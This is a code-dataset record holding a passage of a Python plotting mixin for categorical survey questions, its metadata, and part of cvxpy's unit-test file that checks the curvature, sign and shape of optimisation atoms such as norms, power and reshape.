if self_name is None and other_name is None:
if item.name == other.items[i].name:
raise ValueError('Names of questions must be different'
' to plot a comparison.')
self_item = (
item.rename(self_name) if self_name is not None else item
)
other_item = (
other.items[i].rename(other_name) if other_name is not None
else other.items[i]
)
if filters is not None:
self_item = self_item.where(**filters)
other_item = other_item.where(**filters)
self_item.plot_comparison(
other_item,
ax=ax, self_color=self_color,
other_color=other_color, **kwargs
)
if isinstance(titles, str):
ax.set_title(titles)
elif isinstance(titles, list):
ax.set_title(titles[i])
elif isinstance(titles, dict):
if item.name in titles.keys():
ax.set_title(titles[item.name])
elif self.find_key(item) in titles.keys():
ax.set_title(titles[self.find_key(item)])
if isinstance(x_labels, str):
ax.set_xlabel(x_labels)
elif isinstance(x_labels, list):
ax.set_xlabel(x_labels[i])
elif isinstance(x_labels, dict):
if item.name in x_labels.keys():
ax.set_xlabel(x_labels[item.name])
elif self.find_key(item) in titles.keys():
ax.set_xlabel(x_labels[self.find_key(item)])
return fig
|
import matplotlib.pyplot as plt
from matplotlib.figure import Figure
from typing import List, Union, Dict, Optional, Tuple, Any
from survey.mixins.data_types.categorical_mixin import CategoricalMixin
class CategoricalGroupMixin(object):
items: List[CategoricalMixin]
def _set_categories(self):
"""
Set the Categories for the Group if all Categoricals in the Group have
the same Categories.
"""
ref_names = set(self.items[0].category_names)
all_names = set([
category_name for item in self.items
for category_name in item.category_names
])
if ref_names == all_names:
self._categories = self.items[0].categories
else:
self._categories = None
@property
def categories(self) -> Optional[Union[List[str], Dict[str, int]]]:
"""
Return the categories.
"""
return self._categories
@property
def category_names(self) -> Optional[List[str]]:
"""
Return the names of the categories.
"""
if isinstance(self._categories, list):
return self._categories
elif isinstance(self._categories, dict):
return list(self._categories.keys())
else:
return None
@property
def category_values(self) -> Optional[list]:
"""
Return the values of the categories.
"""
if isinstance(self._categories, list):
return self._categories
elif isinstance(self._categories, dict):
return list(self._categories.values())
else:
return None
def plot_distribution_grid(
self, n_rows: int, n_cols: int,
fig_size: Optional[Tuple[int, int]] = (16, 9),
filters: Optional[Dict[str, Any]] = None,
titles: Union[str, List[str], Dict[str, str]] = '',
x_labels: Union[str, List[str], Dict[str, str]] = '',
drop: Optional[Union[str, List[str]]] = None,
**kwargs
) -> Figure:
"""
Plot a grid of distributions of the group's questions.
:param n_rows: Number of rows in the grid.
:param n_cols: Number of columns in the grid.
:param fig_size: Size for the figure.
:param filters: Optional filters to apply to each question before
plotting.
:param titles: List of titles or dict mapping question keys or names to
titles.
:param x_labels: List of x-axis labels or dict mapping question keys or
names to labels.
:param drop: Optional category or categories to exclude from the plot.
:param kwargs: Other kwargs to pass to each question's
plot_distribution() method.
"""
categories = set(self._questions[0].categories)
share_x = 'all'
for item in self.items[1:]:
if set(item.categories) != categories:
share_x = 'none'
fig, axes = plt.subplots(nrows=n_rows, ncols=n_cols,
figsize=fig_size,
sharex=share_x, sharey='all')
for i, item in enumerate(self.items):
ax = axes.flat[i]
if filters is not None:
item = item.where(**filters)
if drop is not None:
item = item.drop(drop)
item.plot_distribution(ax=ax, **kwargs)
if isinstance(titles, str):
ax.set_title(titles)
elif isinstance(titles, list):
ax.set_title(titles[i])
elif isinstance(titles, dict):
if item.name in titles.keys():
ax.set_title(titles[item.name])
elif self.find_key(item) in titles.keys():
ax.set_title(titles[self.find_key(item)])
if isinstance(x_labels, str):
ax.set_xlabel(x_labels)
elif isinstance(x_labels, list):
ax.set_xlabel(x_labels[i])
elif isinstance(x_labels, dict):
if item.name in x_labels.keys():
ax.set_xlabel(x_labels[item.name])
elif self.find_key(item) in titles.keys():
ax.set_xlabel(x_labels[self.find_key(item)])
return fig
def plot_comparison_grid(
self,
other: 'CategoricalGroupMixin',
n_rows: int, n_cols: int,
filters: Optional[Dict[str, Any]] = None,
self_color: str = 'C0', other_color: str = 'C1',
self_name: Optional[str] = None, other_name: Optional[str] = None,
fig_size: Optional[Tuple[int, int]] = (16, 9),
titles: Union[str, List[str], Dict[str, str]] = '',
x_labels: Union[str, List[str], Dict[str, str]] = '',
**kwargs) -> Figure:
"""
Plot a grid of distributions of comparisons between the corresponding
questions of 2 groups.
:param other: The other group to use.
:param n_rows: Number of rows in the grid.
:param n_cols: Number of columns in the grid.
:param self_color: Color for this group's plot items.
:param other_color: Color for the other group's plot items.
:param self_name: Name for this group's plot items.
:param other_name: Name for the other group's plot items.
:param fig_size: Size for the figure.
:param filters: Optional filters to apply to each question before
plotting.
:param titles: List of titles or dict mapping question keys or names to
titles.
:param x_labels: List of x-axis labels or dict mapping question keys or
names to labels.
:param kwargs: Other kwargs to pass to each question's
plot_distribution() method.
"""
categories = set(self._questions[0].categories)
share_x = 'all'
for item in self.items[1:]:
if set(item.categories) != categories:
share_x = 'none'
fig, axes = plt.subplots(
nrows=n_rows, ncols=n_cols,
figsize=fig_size,
sharex=share_x, sharey='all'
)
if [self_name, other_name].count(None) not in (0, 2):
raise ValueError(
'Either rename both question groups or neither.'
)
if self_name is not None and self_name == other_name:
raise ValueError(
'Names of questions must be different to plot a comparison.'
)
for i, item in enumerate(self.items):
ax = axes.flat[i]
if self_name is None and other_name is None:
if item.name == other.items[i].name:
raise ValueError('Names of questions must be different'
' to plot a comparison.')
self_item = (
item.rename(self_name) if self_name is not None else item
)
other_item = (
other.items[i].rename(other_name) if other_name is not None
else other.items[i]
)
if filters is not None:
self_item = self_item.where(**filters)
other_item = other_item.where(**filters)
self_item.plot_comparison(
other_item,
ax=ax, self_color=self_color,
other_color=other_color, **kwargs
)
if isinstance(titles, str):
ax.set_title(titles)
elif isinstance(titles, list):
ax.set_title(titles[i])
elif isinstance(titles, dict):
if item.name in titles.keys():
ax.set_title(titles[item.name])
elif self.find_key(item) in titles.keys():
ax.set_title(titles[self.find_key(item)])
if isinstance(x_labels, str):
ax.set_xlabel(x_labels)
elif isinstance(x_labels, list):
ax.set_xlabel(x_labels[i])
elif isinstance(x_labels, dict):
if item.name in x_labels.keys():
ax.set_xlabel(x_labels[item.name])
elif self.find_key(item) in titles.keys():
ax.set_xlabel(x_labels[self.find_key(item)])
return fig
|
en
| 0.782896
|
Set the Categories for the Group if all Categoricals in the Group have the same Categories. Return the categories. Return the names of the categories. Return the values of the categories. Plot a grid of distributions of the group's questions. :param n_rows: Number of rows in the grid. :param n_cols: Number of columns in the grid. :param fig_size: Size for the figure. :param filters: Optional filters to apply to each question before plotting. :param titles: List of titles or dict mapping question keys or names to titles. :param x_labels: List of x-axis labels or dict mapping question keys or names to labels. :param drop: Optional category or categories to exclude from the plot. :param kwargs: Other kwargs to pass to each question's plot_distribution() method. Plot a grid of distributions of comparisons between the corresponding questions of 2 groups. :param other: The other group to use. :param n_rows: Number of rows in the grid. :param n_cols: Number of columns in the grid. :param self_color: Color for this group's plot items. :param other_color: Color for the other group's plot items. :param self_name: Name for this group's plot items. :param other_name: Name for the other group's plot items. :param fig_size: Size for the figure. :param filters: Optional filters to apply to each question before plotting. :param titles: List of titles or dict mapping question keys or names to titles. :param x_labels: List of x-axis labels or dict mapping question keys or names to labels. :param kwargs: Other kwargs to pass to each question's plot_distribution() method.
| 3.05656
| 3
|
cvxpy/tests/test_atoms.py
|
rpradal/cvxpy
| 0
|
6628526
|
"""
Copyright 2013 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import cvxpy as cp
import cvxpy.settings as s
from cvxpy.transforms.partial_optimize import partial_optimize
from cvxpy.expressions.variable import Variable
from cvxpy.expressions.constants import Parameter, Constant
from cvxpy.reductions.solvers.defines import INSTALLED_MI_SOLVERS
import numpy as np
from cvxpy import Problem, Minimize
from cvxpy.tests.base_test import BaseTest
import unittest
import scipy.sparse as sp
import scipy.stats
class TestAtoms(BaseTest):
""" Unit tests for the atoms module. """
def setUp(self) -> None:
self.a = Variable(name='a')
self.x = Variable(2, name='x')
self.y = Variable(2, name='y')
self.A = Variable((2, 2), name='A')
self.B = Variable((2, 2), name='B')
self.C = Variable((3, 2), name='C')
def test_add_expr_copy(self) -> None:
"""Test the copy function for AddExpresion class.
"""
atom = self.x + self.y
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with new args
copy = atom.copy(args=[self.A, self.B])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is self.A)
self.assertTrue(copy.args[1] is self.B)
self.assertEqual(copy.get_data(), atom.get_data())
def test_norm_inf(self) -> None:
"""Test the norm_inf class.
"""
exp = self.x+self.y
atom = cp.norm_inf(exp)
# self.assertEqual(atom.name(), "norm_inf(x + y)")
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
assert atom.is_convex()
assert (-atom).is_concave()
self.assertEqual(cp.norm_inf(atom).curvature, s.CONVEX)
self.assertEqual(cp.norm_inf(-atom).curvature, s.CONVEX)
def test_norm1(self) -> None:
"""Test the norm1 class.
"""
exp = self.x+self.y
atom = cp.norm1(exp)
# self.assertEqual(atom.name(), "norm1(x + y)")
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(cp.norm1(atom).curvature, s.CONVEX)
self.assertEqual(cp.norm1(-atom).curvature, s.CONVEX)
def test_list_input(self) -> None:
"""Test that list input is rejected.
"""
with self.assertRaises(Exception) as cm:
cp.max([cp.Variable(), 1])
self.assertTrue(str(cm.exception) in (
"The input must be a single CVXPY Expression, not a list. "
"Combine Expressions using atoms such as bmat, hstack, and vstack."))
with self.assertRaises(Exception) as cm:
cp.norm([1, cp.Variable()])
self.assertTrue(str(cm.exception) in (
"The input must be a single CVXPY Expression, not a list. "
"Combine Expressions using atoms such as bmat, hstack, and vstack."))
x = cp.Variable()
y = cp.Variable()
with self.assertRaises(Exception) as cm:
cp.norm([x, y]) <= 1
self.assertTrue(str(cm.exception) in (
"The input must be a single CVXPY Expression, not a list. "
"Combine Expressions using atoms such as bmat, hstack, and vstack."))
def test_quad_form(self) -> None:
"""Test quad_form atom.
"""
P = Parameter((2, 2), symmetric=True)
expr = cp.quad_form(self.x, P)
assert not expr.is_dcp()
def test_power(self) -> None:
"""Test the power class.
"""
from fractions import Fraction
for shape in [(1, 1), (3, 1), (2, 3)]:
x = Variable(shape)
y = Variable(shape)
exp = x + y
for p in 0, 1, 2, 3, 2.7, .67, -1, -2.3, Fraction(4, 5):
atom = cp.power(exp, p)
self.assertEqual(atom.shape, shape)
if p > 1 or p < 0:
self.assertEqual(atom.curvature, s.CONVEX)
elif p == 1:
self.assertEqual(atom.curvature, s.AFFINE)
elif p == 0:
self.assertEqual(atom.curvature, s.CONSTANT)
else:
self.assertEqual(atom.curvature, s.CONCAVE)
if p != 1:
self.assertEqual(atom.sign, s.NONNEG)
# Test copy with args=None
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with new args
copy = atom.copy(args=[self.y])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is self.y)
self.assertEqual(copy.get_data(), atom.get_data())
assert cp.power(-1, 2).value == 1
# Test the geo_mean class.
def test_geo_mean(self) -> None:
atom = cp.geo_mean(self.x)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONCAVE)
self.assertEqual(atom.sign, s.NONNEG)
# Test copy with args=None
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with new args
copy = atom.copy(args=[self.y])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is self.y)
self.assertEqual(copy.get_data(), atom.get_data())
# Test the harmonic_mean class.
def test_harmonic_mean(self) -> None:
atom = cp.harmonic_mean(self.x)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONCAVE)
self.assertEqual(atom.sign, s.NONNEG)
# Test the pnorm class.
def test_pnorm(self) -> None:
atom = cp.pnorm(self.x, p=1.5)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=1)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=2)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(atom.sign, s.NONNEG)
expr = cp.norm(self.A, 2, axis=0)
self.assertEqual(expr.shape, (2,))
atom = cp.pnorm(self.x, p='inf')
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p='Inf')
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=np.inf)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=.5)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONCAVE)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=.7)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONCAVE)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=-.1)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONCAVE)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=-1)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONCAVE)
self.assertEqual(atom.sign, s.NONNEG)
atom = cp.pnorm(self.x, p=-1.3)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONCAVE)
self.assertEqual(atom.sign, s.NONNEG)
# Test copy with args=None
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with new args
copy = atom.copy(args=[self.y])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is self.y)
self.assertEqual(copy.get_data(), atom.get_data())
def test_matrix_norms(self) -> None:
"""
Matrix 1-norm, 2-norm (sigma_max), infinity-norm,
Frobenius norm, and nuclear-norm.
"""
for p in [1, 2, np.inf, 'fro', 'nuc']:
for var in [self.A, self.C]:
atom = cp.norm(var, p)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
self.assertEqual(atom.sign, s.NONNEG)
var.value = np.random.randn(*var.shape)
self.assertAlmostEqual(atom.value, np.linalg.norm(var.value, ord=p))
pass
def test_quad_over_lin(self) -> None:
# Test quad_over_lin DCP.
atom = cp.quad_over_lin(cp.square(self.x), self.a)
self.assertEqual(atom.curvature, s.CONVEX)
atom = cp.quad_over_lin(-cp.square(self.x), self.a)
self.assertEqual(atom.curvature, s.CONVEX)
atom = cp.quad_over_lin(cp.sqrt(self.x), self.a)
self.assertEqual(atom.curvature, s.UNKNOWN)
assert not atom.is_dcp()
# Test quad_over_lin shape validation.
with self.assertRaises(Exception) as cm:
cp.quad_over_lin(self.x, self.x)
self.assertEqual(str(cm.exception),
"The second argument to quad_over_lin must be a scalar.")
def test_elemwise_arg_count(self) -> None:
"""Test arg count for max and min variants.
"""
with self.assertRaises(Exception) as cm:
cp.maximum(1)
self.assertTrue(str(cm.exception) in (
"__init__() takes at least 3 arguments (2 given)",
"__init__() missing 1 required positional argument: 'arg2'"))
with self.assertRaises(Exception) as cm:
cp.minimum(1)
self.assertTrue(str(cm.exception) in (
"__init__() takes at least 3 arguments (2 given)",
"__init__() missing 1 required positional argument: 'arg2'"))
def test_matrix_frac(self) -> None:
"""Test for the matrix_frac atom.
"""
atom = cp.matrix_frac(self.x, self.A)
self.assertEqual(atom.shape, tuple())
self.assertEqual(atom.curvature, s.CONVEX)
# Test matrix_frac shape validation.
with self.assertRaises(Exception) as cm:
cp.matrix_frac(self.x, self.C)
self.assertEqual(str(cm.exception),
"The second argument to matrix_frac must be a square matrix.")
with self.assertRaises(Exception) as cm:
cp.matrix_frac(Variable(3), self.A)
self.assertEqual(str(cm.exception),
"The arguments to matrix_frac have incompatible dimensions.")
def test_max(self) -> None:
"""Test max.
"""
# One arg, test sign.
self.assertEqual(cp.max(1).sign, s.NONNEG)
self.assertEqual(cp.max(-2).sign, s.NONPOS)
self.assertEqual(cp.max(Variable()).sign, s.UNKNOWN)
self.assertEqual(cp.max(0).sign, s.ZERO)
# Test with axis argument.
self.assertEqual(cp.max(Variable(2), axis=0, keepdims=True).shape, (1,))
self.assertEqual(cp.max(Variable(2), axis=1).shape, (2,))
self.assertEqual(cp.max(Variable((2, 3)), axis=0, keepdims=True).shape, (1, 3))
self.assertEqual(cp.max(Variable((2, 3)), axis=1).shape, (2,))
# Invalid axis.
with self.assertRaises(Exception) as cm:
cp.max(self.x, axis=4)
self.assertEqual(str(cm.exception),
"Invalid argument for axis.")
def test_min(self) -> None:
"""Test min.
"""
# One arg, test sign.
self.assertEqual(cp.min(1).sign, s.NONNEG)
self.assertEqual(cp.min(-2).sign, s.NONPOS)
self.assertEqual(cp.min(Variable()).sign, s.UNKNOWN)
self.assertEqual(cp.min(0).sign, s.ZERO)
# Test with axis argument.
self.assertEqual(cp.min(Variable(2), axis=0).shape, tuple())
self.assertEqual(cp.min(Variable(2), axis=1).shape, (2,))
self.assertEqual(cp.min(Variable((2, 3)), axis=0).shape, (3,))
self.assertEqual(cp.min(Variable((2, 3)), axis=1).shape, (2,))
# Invalid axis.
with self.assertRaises(Exception) as cm:
cp.min(self.x, axis=4)
self.assertEqual(str(cm.exception),
"Invalid argument for axis.")
# Test sign logic for maximum.
def test_maximum_sign(self) -> None:
# Two args.
self.assertEqual(cp.maximum(1, 2).sign, s.NONNEG)
self.assertEqual(cp.maximum(1, Variable()).sign, s.NONNEG)
self.assertEqual(cp.maximum(1, -2).sign, s.NONNEG)
self.assertEqual(cp.maximum(1, 0).sign, s.NONNEG)
self.assertEqual(cp.maximum(Variable(), 0).sign, s.NONNEG)
self.assertEqual(cp.maximum(Variable(), Variable()).sign, s.UNKNOWN)
self.assertEqual(cp.maximum(Variable(), -2).sign, s.UNKNOWN)
self.assertEqual(cp.maximum(0, 0).sign, s.ZERO)
self.assertEqual(cp.maximum(0, -2).sign, s.ZERO)
self.assertEqual(cp.maximum(-3, -2).sign, s.NONPOS)
# Many args.
self.assertEqual(cp.maximum(-2, Variable(), 0, -1, Variable(), 1).sign,
s.NONNEG)
# Promotion.
self.assertEqual(cp.maximum(1, Variable(2)).sign,
s.NONNEG)
self.assertEqual(cp.maximum(1, Variable(2)).shape,
(2,))
# Test sign logic for minimum.
def test_minimum_sign(self) -> None:
# Two args.
self.assertEqual(cp.minimum(1, 2).sign, s.NONNEG)
self.assertEqual(cp.minimum(1, Variable()).sign, s.UNKNOWN)
self.assertEqual(cp.minimum(1, -2).sign, s.NONPOS)
self.assertEqual(cp.minimum(1, 0).sign, s.ZERO)
self.assertEqual(cp.minimum(Variable(), 0).sign, s.NONPOS)
self.assertEqual(cp.minimum(Variable(), Variable()).sign, s.UNKNOWN)
self.assertEqual(cp.minimum(Variable(), -2).sign, s.NONPOS)
self.assertEqual(cp.minimum(0, 0).sign, s.ZERO)
self.assertEqual(cp.minimum(0, -2).sign, s.NONPOS)
self.assertEqual(cp.minimum(-3, -2).sign, s.NONPOS)
# Many args.
self.assertEqual(cp.minimum(-2, Variable(), 0, -1, Variable(), 1).sign,
s.NONPOS)
# Promotion.
self.assertEqual(cp.minimum(-1, Variable(2)).sign,
s.NONPOS)
self.assertEqual(cp.minimum(-1, Variable(2)).shape,
(2,))
def test_sum(self) -> None:
"""Test the sum atom.
"""
self.assertEqual(cp.sum(1).sign, s.NONNEG)
self.assertEqual(cp.sum(Constant([1, -1])).sign, s.UNKNOWN)
self.assertEqual(cp.sum(Constant([1, -1])).curvature, s.CONSTANT)
self.assertEqual(cp.sum(Variable(2)).sign, s.UNKNOWN)
self.assertEqual(cp.sum(Variable(2)).shape, tuple())
self.assertEqual(cp.sum(Variable(2)).curvature, s.AFFINE)
self.assertEqual(cp.sum(Variable((2, 1)), keepdims=True).shape, (1, 1))
# Mixed curvature.
mat = np.array([[1, -1]])
self.assertEqual(cp.sum(mat @ cp.square(Variable(2))).curvature, s.UNKNOWN)
# Test with axis argument.
self.assertEqual(cp.sum(Variable(2), axis=0).shape, tuple())
self.assertEqual(cp.sum(Variable(2), axis=1).shape, (2,))
self.assertEqual(cp.sum(Variable((2, 3)), axis=0, keepdims=True).shape, (1, 3))
self.assertEqual(cp.sum(Variable((2, 3)), axis=0, keepdims=False).shape, (3,))
self.assertEqual(cp.sum(Variable((2, 3)), axis=1).shape, (2,))
# Invalid axis.
with self.assertRaises(Exception) as cm:
cp.sum(self.x, axis=4)
self.assertEqual(str(cm.exception),
"Invalid argument for axis.")
A = sp.eye(3)
self.assertEqual(cp.sum(A).value, 3)
A = sp.eye(3)
self.assertItemsAlmostEqual(cp.sum(A, axis=0).value, [1, 1, 1])
def test_multiply(self) -> None:
"""Test the multiply atom.
"""
self.assertEqual(cp.multiply([1, -1], self.x).sign, s.UNKNOWN)
self.assertEqual(cp.multiply([1, -1], self.x).curvature, s.AFFINE)
self.assertEqual(cp.multiply([1, -1], self.x).shape, (2,))
pos_param = Parameter(2, nonneg=True)
neg_param = Parameter(2, nonpos=True)
self.assertEqual(cp.multiply(pos_param, pos_param).sign, s.NONNEG)
self.assertEqual(cp.multiply(pos_param, neg_param).sign, s.NONPOS)
self.assertEqual(cp.multiply(neg_param, neg_param).sign, s.NONNEG)
self.assertEqual(cp.multiply(neg_param, cp.square(self.x)).curvature, s.CONCAVE)
# Test promotion.
self.assertEqual(cp.multiply([1, -1], 1).shape, (2,))
self.assertEqual(cp.multiply(1, self.C).shape, self.C.shape)
self.assertEqual(cp.multiply(self.x, [1, -1]).sign, s.UNKNOWN)
self.assertEqual(cp.multiply(self.x, [1, -1]).curvature, s.AFFINE)
self.assertEqual(cp.multiply(self.x, [1, -1]).shape, (2,))
# Test the vstack class.
def test_vstack(self) -> None:
atom = cp.vstack([self.x, self.y, self.x])
self.assertEqual(atom.name(), "Vstack(x, y, x)")
self.assertEqual(atom.shape, (3, 2))
atom = cp.vstack([self.A, self.C, self.B])
self.assertEqual(atom.name(), "Vstack(A, C, B)")
self.assertEqual(atom.shape, (7, 2))
entries = []
for i in range(self.x.shape[0]):
entries.append(self.x[i])
atom = cp.vstack(entries)
self.assertEqual(atom.shape, (2, 1))
# self.assertEqual(atom[1,0].name(), "vstack(x[0,0], x[1,0])[1,0]")
with self.assertRaises(Exception) as cm:
cp.vstack([self.C, 1])
self.assertEqual(str(cm.exception),
"All the input dimensions except for axis 0 must match exactly.")
with self.assertRaises(Exception) as cm:
cp.vstack([self.x, Variable(3)])
self.assertEqual(str(cm.exception),
"All the input dimensions except for axis 0 must match exactly.")
with self.assertRaises(TypeError) as cm:
cp.vstack()
def test_reshape(self) -> None:
"""Test the reshape class.
"""
expr = cp.reshape(self.A, (4, 1))
self.assertEqual(expr.sign, s.UNKNOWN)
self.assertEqual(expr.curvature, s.AFFINE)
self.assertEqual(expr.shape, (4, 1))
expr = cp.reshape(expr, (2, 2))
self.assertEqual(expr.shape, (2, 2))
expr = cp.reshape(cp.square(self.x), (1, 2))
self.assertEqual(expr.sign, s.NONNEG)
self.assertEqual(expr.curvature, s.CONVEX)
self.assertEqual(expr.shape, (1, 2))
with self.assertRaises(Exception) as cm:
cp.reshape(self.C, (5, 4))
self.assertEqual(str(cm.exception),
"Invalid reshape dimensions (5, 4).")
# Test C-style reshape.
a = np.arange(10)
A_np = np.reshape(a, (5, 2), order='C')
A_cp = cp.reshape(a, (5, 2), order='C')
self.assertItemsAlmostEqual(A_np, A_cp.value)
X = cp.Variable((5, 2))
prob = cp.Problem(cp.Minimize(0), [X == A_cp])
prob.solve()
self.assertItemsAlmostEqual(A_np, X.value)
a_np = np.reshape(A_np, 10, order='C')
a_cp = cp.reshape(A_cp, 10, order='C')
self.assertItemsAlmostEqual(a_np, a_cp.value)
x = cp.Variable(10)
prob = cp.Problem(cp.Minimize(0), [x == a_cp])
prob.solve()
self.assertItemsAlmostEqual(a_np, x.value)
# Test more complex C-style reshape: matrix to another matrix
b = np.array([
[0, 1, 2],
[3, 4, 5],
[6, 7, 8],
[9, 10, 11],
])
b_reshaped = b.reshape((2, 6), order='C')
X = cp.Variable(b.shape)
X_reshaped = cp.reshape(X, (2, 6), order='C')
prob = cp.Problem(cp.Minimize(0), [X_reshaped == b_reshaped])
prob.solve()
self.assertItemsAlmostEqual(b_reshaped, X_reshaped.value)
self.assertItemsAlmostEqual(b, X.value)
def test_vec(self) -> None:
"""Test the vec atom.
"""
expr = cp.vec(self.C)
self.assertEqual(expr.sign, s.UNKNOWN)
self.assertEqual(expr.curvature, s.AFFINE)
self.assertEqual(expr.shape, (6,))
expr = cp.vec(self.x)
self.assertEqual(expr.shape, (2,))
expr = cp.vec(cp.square(self.a))
self.assertEqual(expr.sign, s.NONNEG)
self.assertEqual(expr.curvature, s.CONVEX)
self.assertEqual(expr.shape, (1,))
def test_diag(self) -> None:
"""Test the diag atom.
"""
expr = cp.diag(self.x)
self.assertEqual(expr.sign, s.UNKNOWN)
self.assertEqual(expr.curvature, s.AFFINE)
self.assertEqual(expr.shape, (2, 2))
expr = cp.diag(self.A)
self.assertEqual(expr.sign, s.UNKNOWN)
self.assertEqual(expr.curvature, s.AFFINE)
self.assertEqual(expr.shape, (2,))
expr = cp.diag(self.x.T)
self.assertEqual(expr.sign, s.UNKNOWN)
self.assertEqual(expr.curvature, s.AFFINE)
self.assertEqual(expr.shape, (2, 2))
psd_matrix = np.array([[1, -1], [-1, 1]])
expr = cp.diag(psd_matrix)
self.assertEqual(expr.sign, s.NONNEG)
self.assertEqual(expr.curvature, s.CONSTANT)
self.assertEqual(expr.shape, (2,))
with self.assertRaises(Exception) as cm:
cp.diag(self.C)
self.assertEqual(str(cm.exception),
"Argument to diag must be a vector or square matrix.")
# Test that diag is PSD
w = np.array([1.0, 2.0])
expr = cp.diag(w)
self.assertTrue(expr.is_psd())
expr = cp.diag(-w)
self.assertTrue(expr.is_nsd())
expr = cp.diag(np.array([1, -1]))
self.assertFalse(expr.is_psd())
self.assertFalse(expr.is_nsd())
def test_trace(self) -> None:
"""Test the trace atom.
"""
expr = cp.trace(self.A)
self.assertEqual(expr.sign, s.UNKNOWN)
self.assertEqual(expr.curvature, s.AFFINE)
self.assertEqual(expr.shape, tuple())
with self.assertRaises(Exception) as cm:
cp.trace(self.C)
self.assertEqual(str(cm.exception),
"Argument to trace must be a square matrix.")
def test_log1p(self) -> None:
"""Test the log1p atom.
"""
expr = cp.log1p(1)
self.assertEqual(expr.sign, s.NONNEG)
self.assertEqual(expr.curvature, s.CONSTANT)
self.assertEqual(expr.shape, tuple())
expr = cp.log1p(-0.5)
self.assertEqual(expr.sign, s.NONPOS)
def test_upper_tri(self) -> None:
with self.assertRaises(Exception) as cm:
cp.upper_tri(self.C)
self.assertEqual(str(cm.exception),
"Argument to upper_tri must be a square matrix.")
def test_vec_to_upper_tri(self) -> None:
from cvxpy.atoms.affine.upper_tri import vec_to_upper_tri
x = Variable(shape=(3,))
X = vec_to_upper_tri(x)
x.value = np.array([1, 2, 3])
actual = X.value
expect = np.array([[1, 2], [0, 3]])
assert np.allclose(actual, expect)
y = Variable(shape=(1,))
y.value = np.array([4])
Y = vec_to_upper_tri(y, strict=True)
actual = Y.value
expect = np.array([[0, 4], [0, 0]])
assert np.allclose(actual, expect)
A_expect = np.array([[0, 11, 12, 13],
[0, 0, 16, 17],
[0, 0, 0, 21],
[0, 0, 0, 0]])
a = np.array([11, 12, 13, 16, 17, 21])
A_actual = vec_to_upper_tri(a, strict=True).value
assert np.allclose(A_actual, A_expect)
def test_huber(self) -> None:
# Valid.
cp.huber(self.x, 1)
with self.assertRaises(Exception) as cm:
cp.huber(self.x, -1)
self.assertEqual(str(cm.exception),
"M must be a non-negative scalar constant.")
with self.assertRaises(Exception) as cm:
cp.huber(self.x, [1, 1])
self.assertEqual(str(cm.exception),
"M must be a non-negative scalar constant.")
# M parameter.
M = Parameter(nonneg=True)
# Valid.
cp.huber(self.x, M)
M.value = 1
self.assertAlmostEqual(cp.huber(2, M).value, 3)
# Invalid.
M = Parameter(nonpos=True)
with self.assertRaises(Exception) as cm:
cp.huber(self.x, M)
self.assertEqual(str(cm.exception),
"M must be a non-negative scalar constant.")
# Test copy with args=None
atom = cp.huber(self.x, 2)
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
